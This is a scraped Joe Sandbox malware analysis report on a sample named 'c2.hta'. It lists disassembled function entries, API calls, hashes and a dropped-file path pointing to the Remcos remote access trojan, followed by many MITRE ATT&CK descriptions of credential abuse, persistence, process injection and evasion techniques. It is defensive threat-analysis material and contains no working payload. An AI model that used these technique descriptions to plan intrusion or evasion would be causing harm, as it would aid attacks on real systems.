Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 47785ab4525ea8d696d675017d26a3874389153d8af5f54983b1fe63cbf2361d
Instruction ID: 694963959906c55235d44e6a381695facde56f097a53aa7997f74237a0457ed3
Opcode Fuzzy Hash: 47785ab4525ea8d696d675017d26a3874389153d8af5f54983b1fe63cbf2361d
Instruction Fuzzy Hash: 2BD0A936384304B7E224A331AD0BFE22A90AB10B00F10086A7309AB0D0CCA068008A50

Function 00B92DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B92E08
PostMessageW.USER32(00000000), ref: 00B92E0F

Part of subcall function 00B6F292: Sleep.KERNEL32 ref: 00B6F30A

Strings

Shell_TrayWnd, xrefs: 00B92E01

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 26797621f63f248438cf2e72e2c85b874abe1707a750dee29b868aa4ea850487
Instruction ID: 0ff3551b1d10371aa72d067ee8db2636d8872a6d3cf930c19fad9e974ffbf6a4
Opcode Fuzzy Hash: 26797621f63f248438cf2e72e2c85b874abe1707a750dee29b868aa4ea850487
Instruction Fuzzy Hash: E5D0A9323C13047BE224A331AD0BFD22A90AB10B00F10086A7305AB0D0CCA068008A54

Function 00B3C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00B3C213
GetLastError.KERNEL32 ref: 00B3C221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B3C27C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: c4dc046c012d7fa963587df00cf32b7c99b07a27aaa2c1950ccfaa4381a1b2cb
Instruction ID: dc461de429bad9c8154d54476bf5475c16e99c58c726494c342ed19522a768c1
Opcode Fuzzy Hash: c4dc046c012d7fa963587df00cf32b7c99b07a27aaa2c1950ccfaa4381a1b2cb
Instruction Fuzzy Hash: 5E418D31600616EBDB219FE9CC48AAB7FE5EF11710F3541E9E869BB1A1DB309D05CB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c2.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\remcos\logs.dat

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c044e354-944b-48f6-8cb4-8b605f9923f9.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250107213305Z-180.bmp

Windows Analysis Report
c2.hta

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre